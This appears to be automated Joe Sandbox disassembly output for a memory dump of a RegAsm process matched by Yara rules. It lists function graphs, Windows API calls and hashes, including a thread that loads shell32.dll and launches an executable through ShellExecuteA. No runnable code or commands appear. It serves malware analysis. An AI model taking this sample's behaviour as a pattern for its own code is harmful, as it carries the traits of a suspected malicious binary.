                                                                            • String ID:
                                                                            • API String ID: 4237864984-0
                                                                            • Opcode ID: 87ef763bbd003f1d2de960a3db6ca709dde3cd444b7d1b6f895e6fd8deb0075d
                                                                            • Instruction ID: c043dc6610800097a8c7d9f7805d75e01504a092e95ab29a96a2aa982ce353c5
                                                                            • Opcode Fuzzy Hash: 87ef763bbd003f1d2de960a3db6ca709dde3cd444b7d1b6f895e6fd8deb0075d
                                                                            • Instruction Fuzzy Hash: FCA14732A041559FCF19DF28EC91BAE3BA1AB46314F18016EF801EB3D2C7398957D759

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 69 4038c0-40398c call 40742e call 40745e LoadLibraryW call 402320 call 401fd0 * 2 81 403990-403995 69->81 81->81 82 403997-4039e0 call 404390 call 403730 call 4042a0 81->82 90 4039e2 82->90 91 4039e4-403abf call 4084c0 82->91 90->91 97 403ac1-403acc 91->97 98 403aec-403af3 91->98 99 403ae2-403ae9 call 40745e 97->99 100 403ace-403adc 97->100 101 403b22-403b3e 98->101 102 403af5-403b02 98->102 99->98 100->99 105 403b40-403b4d 101->105 106 403b6d-403bd4 call 40ba2a call 40dcfa call 40bd99 101->106 103 403b04-403b12 102->103 104 403b18-403b1f call 40745e 102->104 103->104 104->101 109 403b63-403b6a call 40745e 105->109 110 403b4f-403b5d 105->110 121 403bd7-403bdc 106->121 109->106 110->109 121->121 122 403bde-403c24 call 404390 call 403730 call 4042a0 121->122 130 403c26 122->130 131 403c28-403cef call 4084c0 122->131 130->131 137 403cf1-403cfc 131->137 138 403d1c-403d23 131->138 139 403d12-403d19 call 40745e 137->139 140 403cfe-403d0c 137->140 141 403d52-403d6e 138->141 142 403d25-403d32 138->142 139->138 140->139 146 403d70-403d7d 141->146 147 403d9d-403e38 call 40ba2a call 40dcfa call 40bd99 call 402320 ShellExecuteA * 2 141->147 144 403d34-403d42 142->144 145 403d48-403d4f call 40745e 142->145 144->145 145->141 151 403d93-403d9a call 40745e 146->151 152 403d7f-403d8d 146->152 163 403e67-403e8c 147->163 164 403e3a-403e47 147->164 151->147 152->151 165 403eba-403ecd call 407420 163->165 166 403e8e-403e9e 163->166 167 403e49-403e57 164->167 168 403e5d-403e64 call 40745e 164->168 169 403eb0-403eb7 call 40745e 166->169 170 403ea0-403eae 166->170 167->168 168->163 169->165 170->169
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(shell32.dll), ref: 0040390A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID: .exe$open$shell32.dll
                                                                            • API String ID: 1029625771-3690275032
                                                                            • Opcode ID: c9f59ac015d61ec70614d93d888e022ef416f64b299715dc7f56bdbe0cac2894
                                                                            • Instruction ID: 7d5b2598125341daaadbafcfaee473a7e4c633bdeea8f021ad5caa46309aa23f
                                                                            • Opcode Fuzzy Hash: c9f59ac015d61ec70614d93d888e022ef416f64b299715dc7f56bdbe0cac2894
                                                                            • Instruction Fuzzy Hash: EFE12A712083408BD718CF28CC45B6FBBE5BF85305F244A2DF489AB2D2D779E6458B5A

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(?,?,0041142C,00000016,0040BD98,?,?,3037F390,0040BD98,?), ref: 00411443
                                                                            • TerminateProcess.KERNEL32(00000000,?,0041142C,00000016,0040BD98,?,?,3037F390,0040BD98,?), ref: 0041144A
                                                                            • ExitProcess.KERNEL32 ref: 0041145C
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Process$CurrentExitTerminate
                                                                            • String ID:
                                                                            • API String ID: 1703294689-0
                                                                            • Opcode ID: fdc9db31659cbe28c415a8b0888f718e5b65b0592ff8268f2e9698ce38014a47
                                                                            • Instruction ID: 3fe6f93935658f8ab67006e652a10cd0383134051074610e396dae59c432ecd7
                                                                            • Opcode Fuzzy Hash: fdc9db31659cbe28c415a8b0888f718e5b65b0592ff8268f2e9698ce38014a47
                                                                            • Instruction Fuzzy Hash: 5DD09E31100148ABCF117F61EC0DA993F2AAF407557858025FA0A56131CB369993AA58

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 295 416daf-416dce 296 416dd4-416dd6 295->296 297 416fa8 295->297 298 416e02-416e28 296->298 299 416dd8-416df7 call 40def7 296->299 300 416faa-416fae 297->300 302 416e2a-416e2c 298->302 303 416e2e-416e34 298->303 306 416dfa-416dfd 299->306 302->303 305 416e36-416e40 302->305 303->299 303->305 307 416e50-416e5b call 4168fc 305->307 308 416e42-416e4d call 418af3 305->308 306->300 313 416e9d-416eaf 307->313 314 416e5d-416e62 307->314 308->307 317 416eb1-416eb7 313->317 318 416f00-416f20 WriteFile 313->318 315 416e64-416e68 314->315 316 416e87-416e9b call 4164c2 314->316 319 416f70-416f82 315->319 320 416e6e-416e7d call 416894 315->320 337 416e80-416e82 316->337 324 416eb9-416ebc 317->324 325 416eee-416efe call 41697a 317->325 322 416f22-416f28 GetLastError 318->322 323 416f2b 318->323 326 416f84-416f8a 319->326 327 416f8c-416f9e 319->327 320->337 322->323 331 416f2e-416f39 323->331 332 416edc-416eec call 416b3e 324->332 333 416ebe-416ec1 324->333 343 416ed7-416eda 325->343 326->297 326->327 327->306 338 416fa3-416fa6 331->338 339 416f3b-416f40 331->339 332->343 333->319 340 416ec7-416ed2 call 416a55 333->340 337->331 338->300 344 416f42-416f47 339->344 345 416f6e 339->345 340->343 343->337 346 416f60-416f69 call 40e03b 344->346 347 416f49-416f5b 344->347 345->319 346->306 347->306
                                                                            APIs
                                                                              • Part of subcall function 004164C2: GetConsoleOutputCP.KERNEL32(3037F390,00000000,00000000,0040BDB8), ref: 00416525
                                                                            • WriteFile.KERNELBASE(FFBF5BE8,00000000,?,0040BC75,00000000,00000000,00000000,00000000,?,?,0040BC75,?,?,004328B8,00000010,0040BDB8), ref: 00416F18
                                                                            • GetLastError.KERNEL32(?,0040BC75,?,?,004328B8,00000010,0040BDB8,?,?,00000000,?), ref: 00416F22
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ConsoleErrorFileLastOutputWrite
                                                                            • String ID:
                                                                            • API String ID: 2915228174-0
                                                                            • Opcode ID: f464ed671a76038d08897ffb1fb948258ea98ac2c0acb72c9529f46f39d22c7a
                                                                            • Instruction ID: cb585fdb2482b244a4d3bef91fab55670e651a1c55327e645a67e42ff2a15e13
                                                                            • Opcode Fuzzy Hash: f464ed671a76038d08897ffb1fb948258ea98ac2c0acb72c9529f46f39d22c7a
                                                                            • Instruction Fuzzy Hash: 4461D775D04249AFDF10CFA8C844AEF7FB9AF09308F16415AF804A7252D379D986CB69

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 350 403ee0-403f1d CreateThread WaitForSingleObject call 407420 352 403f22-403f25 350->352
                                                                            APIs
                                                                            • CreateThread.KERNELBASE(00000000,00000000,004038C0,00000000,00000000,3037F390), ref: 00403F06
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00403F0F
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateObjectSingleThreadWait
                                                                            • String ID:
                                                                            • API String ID: 1891408510-0
                                                                            • Opcode ID: af3e1afe4429c917983b20489d93451d494df3de1508f1cbbf6b72916d2180c4
                                                                            • Instruction ID: 9ada69c4f7ca39928594594d106047c4e65b58e1a3541a0c5f1fc3d2bb6a9bfa
                                                                            • Opcode Fuzzy Hash: af3e1afe4429c917983b20489d93451d494df3de1508f1cbbf6b72916d2180c4
                                                                            • Instruction Fuzzy Hash: 10E08675758300BBD710EF24EC07F1A3BE4BB48B05F914A39F295A62D0D674B404965E

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 381 414d5d-414d71 call 41cc2f 384 414d73-414d75 381->384 385 414d77-414d7f 381->385 386 414dc5-414de5 call 41cb9e 384->386 387 414d81-414d88 385->387 388 414d8a-414d8d 385->388 397 414df7 386->397 398 414de7-414df5 call 40e03b 386->398 387->388 390 414d95-414da9 call 41cc2f * 2 387->390 391 414dab-414dbb call 41cc2f CloseHandle 388->391 392 414d8f-414d93 388->392 390->384 390->391 391->384 400 414dbd-414dc3 GetLastError 391->400 392->390 392->391 402 414df9-414dfc 397->402 398->402 400->386
                                                                            APIs
                                                                            • CloseHandle.KERNELBASE(00000000,00000000,CF830579,?,00414C44,00000000,CF830579,00432C48,0000000C,00414D00,0040BD0B,?), ref: 00414DB3
                                                                            • GetLastError.KERNEL32(?,00414C44,00000000,CF830579,00432C48,0000000C,00414D00,0040BD0B,?), ref: 00414DBD
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseErrorHandleLast
                                                                            • String ID:
                                                                            • API String ID: 918212764-0
                                                                            • Opcode ID: cf05b64a0bbd980239ba65db1c1c6f103e722fbee84b5f4660c8636332b429dd
                                                                            • Instruction ID: ceb111eb948f9657ebdeceefd9bfba8073a9b29251fc9eed98a790ab6a2c0bec
                                                                            • Opcode Fuzzy Hash: cf05b64a0bbd980239ba65db1c1c6f103e722fbee84b5f4660c8636332b429dd
                                                                            • Instruction Fuzzy Hash: 06114C336041241ADB246635BC867FE6749CBC1738F290A5FF808C72C1DE388CC2929C

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 406 4143cc-4143f4 407 4143f6-4143f8 406->407 408 4143fa-4143fc 406->408 409 41444b-41444e 407->409 410 414402-414412 call 414301 408->410 411 4143fe-414400 408->411 414 414431-414448 410->414 415 414414-414422 GetProcAddress 410->415 411->409 417 41444a 414->417 415->414 416 414424-41442f call 410bb3 415->416 416->417 417->409
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 672b8ef80a1082ffe797a66fe554d50d659c07feffc08aafbed84bfcd02d8428
                                                                            • Instruction ID: d7b25293e7db54f96000769fea1aeb7630fb582f3d7d0c2fc2c622193e8995c8
                                                                            • Opcode Fuzzy Hash: 672b8ef80a1082ffe797a66fe554d50d659c07feffc08aafbed84bfcd02d8428
                                                                            • Instruction Fuzzy Hash: 620128373002255F9F25CF6EEC40ADB33A6FBC07243148136FA20CB684DA34D8829799

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 420 413ef2-413f18 call 413cc8 423 413f71-413f74 420->423 424 413f1a-413f2c call 41fe8c 420->424 426 413f31-413f36 424->426 426->423 427 413f38-413f70 426->427
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: __wsopen_s
                                                                            • String ID:
                                                                            • API String ID: 3347428461-0
                                                                            • Opcode ID: 86b5a37895ede01666616fd7f26fe40e68c10059cd8d9e9be6e6956d389c093e
                                                                            • Instruction ID: be02312cd07e58b193bdeee16c95f5fde802225de20a5ed1c7ae4422ede983e8
                                                                            • Opcode Fuzzy Hash: 86b5a37895ede01666616fd7f26fe40e68c10059cd8d9e9be6e6956d389c093e
                                                                            • Instruction Fuzzy Hash: 46110375A0420AAFCB05DF58E9419DB7BF9EF48304F04406AF809AB351D630EA15CBA8

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 428 41fb65-41fb89 CreateFileW
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(?,00000000,?,0041FF58,?,?,00000000,?,0041FF58,?,0000000C), ref: 0041FB82
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 32f1cee3c5876f16e38c750b1e34007635eee82df29fa4d42b06ff8a7cf34f14
                                                                            • Instruction ID: 28cfbda6749b70c9de2fbd9d245fef773b8951bf2dd70127050a9a6bf190398c
                                                                            • Opcode Fuzzy Hash: 32f1cee3c5876f16e38c750b1e34007635eee82df29fa4d42b06ff8a7cf34f14
                                                                            • Instruction Fuzzy Hash: 05D06C3210010DFBDF128F84DC06EDA3FAAFB4C714F018010FA5856021C732E832AB94
                                                                            APIs
                                                                            • GetLocaleInfoW.KERNEL32(3FC00000,2000000B,0041EEBF,00000002,00000000,?,?,?,0041EEBF,?,00000000), ref: 0041EC3A
                                                                            • GetLocaleInfoW.KERNEL32(3FC00000,20001004,0041EEBF,00000002,00000000,?,?,?,0041EEBF,?,00000000), ref: 0041EC63
                                                                            • GetACP.KERNEL32(?,?,0041EEBF,?,00000000), ref: 0041EC78
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InfoLocale
                                                                            • String ID: ACP$OCP
                                                                            • API String ID: 2299586839-711371036
                                                                            • Opcode ID: ae0517b9bda7198648f1cbed6e652a34a4e79f3510d6da964a24c0c18db862fc
                                                                            • Instruction ID: 81a9d30784dd22d719d41cfb92251f6e816e7a4bc62bdb22216d11a6fc444572
                                                                            • Opcode Fuzzy Hash: ae0517b9bda7198648f1cbed6e652a34a4e79f3510d6da964a24c0c18db862fc
                                                                            • Instruction Fuzzy Hash: 92218E3AB04101AADB34CF56CD05AD773A7AF50B50B568826FD0AD7211F736EE81C798
                                                                            APIs
                                                                              • Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
                                                                              • Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1
                                                                            • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0041EE82
                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 0041EECB
                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 0041EEDA
                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0041EF22
                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0041EF41
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                            • String ID:
                                                                            • API String ID: 415426439-0
                                                                            • Opcode ID: 1f142972335a53d1e2416df24534188105d76140515381cc06687f0020485920
                                                                            • Instruction ID: eeabbf5cfaddba79e94d22b4dd48aaeada7d5b667952b3c456454f902e5df75d
                                                                            • Opcode Fuzzy Hash: 1f142972335a53d1e2416df24534188105d76140515381cc06687f0020485920
                                                                            • Instruction Fuzzy Hash: B4519075A00315ABDF20DFA6DC41BEB77B8FF48700F54442AAD14E7290E7789980CB69
                                                                            APIs
                                                                              • Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
                                                                              • Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1
                                                                            • GetACP.KERNEL32(?,?,?,?,?,?,00411EE1,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0041E4D3
                                                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00411EE1,?,?,?,00000055,?,-00000050,?,?), ref: 0041E4FE
                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0041E661
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                            • String ID: utf8
                                                                            • API String ID: 607553120-905460609
                                                                            • Opcode ID: d2e92ad91d33230e432f41824a885b4f53a9106f8c4d9673b702c20c8aa694f9
                                                                            • Instruction ID: 5e8f11e88951c7c1c9557d61489bca48d24d80555c5ca4e9e4b82e7d51b65768
                                                                            • Opcode Fuzzy Hash: d2e92ad91d33230e432f41824a885b4f53a9106f8c4d9673b702c20c8aa694f9
                                                                            • Instruction Fuzzy Hash: 8F711775A00611AADB24AB77CC42BE773A8EF54708F14442BFD05D7281FB7CE9818799
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _strrchr
                                                                            • String ID:
                                                                            • API String ID: 3213747228-0
                                                                            • Opcode ID: d8f824a3a597dbe048be884bb3e91045552750dfa5ffe6b567c0d7537b351b3d
                                                                            • Instruction ID: 91afe31f9ab3d507f6121463a8ee3d13cfef47ac4a512e863f990cc27fdcea00
                                                                            • Opcode Fuzzy Hash: d8f824a3a597dbe048be884bb3e91045552750dfa5ffe6b567c0d7537b351b3d
                                                                            • Instruction Fuzzy Hash: 92B15872E00645DFDB119F68C891BEEBBE5EF85310F14816BE815AB341D2389D81CBA9
                                                                            APIs
                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00407B0D
                                                                            • IsDebuggerPresent.KERNEL32 ref: 00407BD9
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00407BF9
                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 00407C03
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                            • String ID:
                                                                            • API String ID: 254469556-0
                                                                            • Opcode ID: bdb8d4ffe5861b74027a400539b36d4e8f115b4355d90c864d7f04757154f5f6
                                                                            • Instruction ID: ca20a48664bdef0e78e9b146848890f6e34f40b99dedcfcf476291c653997e40
                                                                            • Opcode Fuzzy Hash: bdb8d4ffe5861b74027a400539b36d4e8f115b4355d90c864d7f04757154f5f6
                                                                            • Instruction Fuzzy Hash: 1B314B75D0521CDBDF20DFA0D9497CDBBB8BF04304F1040AAE50DA7290EB756A859F09
                                                                            APIs
                                                                              • Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
                                                                              • Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1
                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041E879
                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041E8C3
                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041E989
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InfoLocale$ErrorLast
                                                                            • String ID:
                                                                            • API String ID: 661929714-0
                                                                            • Opcode ID: dd539c89c5381dfdaac91928ad5ed676a1006981e28db1904c6f4bbe4cde2b34
                                                                            • Instruction ID: efc99f0a6d6f1c6c35933ec1b38cf6b3cd41524c9fcadcabef19194d257b4763
                                                                            • Opcode Fuzzy Hash: dd539c89c5381dfdaac91928ad5ed676a1006981e28db1904c6f4bbe4cde2b34
                                                                            • Instruction Fuzzy Hash: EB618CB59101079BDB689F26CD82BEA77A8FF04340F14417BED16C6281F738D981DB58
                                                                            APIs
                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000001), ref: 0040DE70
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000001), ref: 0040DE7A
                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000001), ref: 0040DE87
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                            • String ID:
                                                                            • API String ID: 3906539128-0
                                                                            • Opcode ID: b5dd4f76152aea6ca03237fb28cccd4ebdc33645a90cdebeab5d7b36533c9830
                                                                            • Instruction ID: 2886232a598c6d0739cb6745ed5e05dca1263a9451a5c599d013a0f88592b0f0
                                                                            • Opcode Fuzzy Hash: b5dd4f76152aea6ca03237fb28cccd4ebdc33645a90cdebeab5d7b36533c9830
                                                                            • Instruction Fuzzy Hash: 4131E574D012189BCB21DF69D98878DBBB8BF08310F5041EAE41CA7291E774AF858F48
                                                                            APIs
                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 004077F6
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FeaturePresentProcessor
                                                                            • String ID:
                                                                            • API String ID: 2325560087-0
                                                                            • Opcode ID: 96a2ba3aa580dc615e5e38e6a61e3a4296c942238419a14d8ec0a8789d2e52c4
                                                                            • Instruction ID: 853601205c21894bcdc8f75123652b739dccbac0e00907a06a8c71bf04373a9d
                                                                            • Opcode Fuzzy Hash: 96a2ba3aa580dc615e5e38e6a61e3a4296c942238419a14d8ec0a8789d2e52c4
                                                                            • Instruction Fuzzy Hash: 865180B2E056059FEB18CF54E9857AEBBF0FB48350F14913AD501EB390D378A940CB59
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7be1b563e95d33199e7689ec4de1d78c2bffa075c9047012787a74e04073e273
                                                                            • Instruction ID: e26fa8b462e3a3bc0dcd1cb195ad12d8a73a1b261898cc61817e46cff9ff25aa
                                                                            • Opcode Fuzzy Hash: 7be1b563e95d33199e7689ec4de1d78c2bffa075c9047012787a74e04073e273
                                                                            • Instruction Fuzzy Hash: 9841A3B5804219AEDB20DF69CC89AEEBBB9EF45304F1441EEE418D3201DB359E858F54
                                                                            APIs
                                                                              • Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
                                                                              • Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1
                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041EACC
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$InfoLocale
                                                                            • String ID:
                                                                            • API String ID: 3736152602-0
                                                                            • Opcode ID: 22a4290edeb40b255e0ef88b49f21dfdd78c731e0f866b45595c0c5f80cee5a7
                                                                            • Instruction ID: 09566a44d01ac47d2cdad9f49e07ec0328cace9eeb3adbfa8c3b07b4827ecd72
                                                                            • Opcode Fuzzy Hash: 22a4290edeb40b255e0ef88b49f21dfdd78c731e0f866b45595c0c5f80cee5a7
                                                                            • Instruction Fuzzy Hash: D321AF36605206ABDB28DE26DD42AFB73A8EF44314B10407FED02D6241EB78AD81CB58
                                                                            APIs
                                                                              • Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
                                                                              • Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1
                                                                            • EnumSystemLocalesW.KERNEL32(0041E825,00000001,00000000,?,-00000050,?,0041EE56,00000000,?,?,?,00000055,?), ref: 0041E771
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                            • String ID:
                                                                            • API String ID: 2417226690-0
                                                                            • Opcode ID: 9637497d46bd12567f8eabdc0472934baf484039a92a8dbd1bfa50b3c5102b1b
                                                                            • Instruction ID: f28f85ac1fea5866725ce88a4d547c14bcace0560233e7335010750b785556cb
                                                                            • Opcode Fuzzy Hash: 9637497d46bd12567f8eabdc0472934baf484039a92a8dbd1bfa50b3c5102b1b
                                                                            • Instruction Fuzzy Hash: F0112C3A6007019FEB189F3AD8916FAB791FF80368B14442ED95747740E7757843C744
                                                                            APIs
                                                                              • Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
                                                                              • Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1
                                                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0041EB22,00000000,00000000,?), ref: 0041ECD3
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$InfoLocale
                                                                            • String ID:
                                                                            • API String ID: 3736152602-0
                                                                            • Opcode ID: f78a423274370276909a02de998c8e2fb19ace7283c045400ea6aabaf7fbf6a9
                                                                            • Instruction ID: 6e93bce3e8a9596dc076f6a872b53f7d727095e2315f943068ff1bd0afa52940
                                                                            • Opcode Fuzzy Hash: f78a423274370276909a02de998c8e2fb19ace7283c045400ea6aabaf7fbf6a9
                                                                            • Instruction Fuzzy Hash: 56F02D3A600113BFDB245B26EC09BFB7764EB40354F19442AEC06A3280EA78FDC2C694
                                                                            APIs
                                                                              • Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
                                                                              • Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1
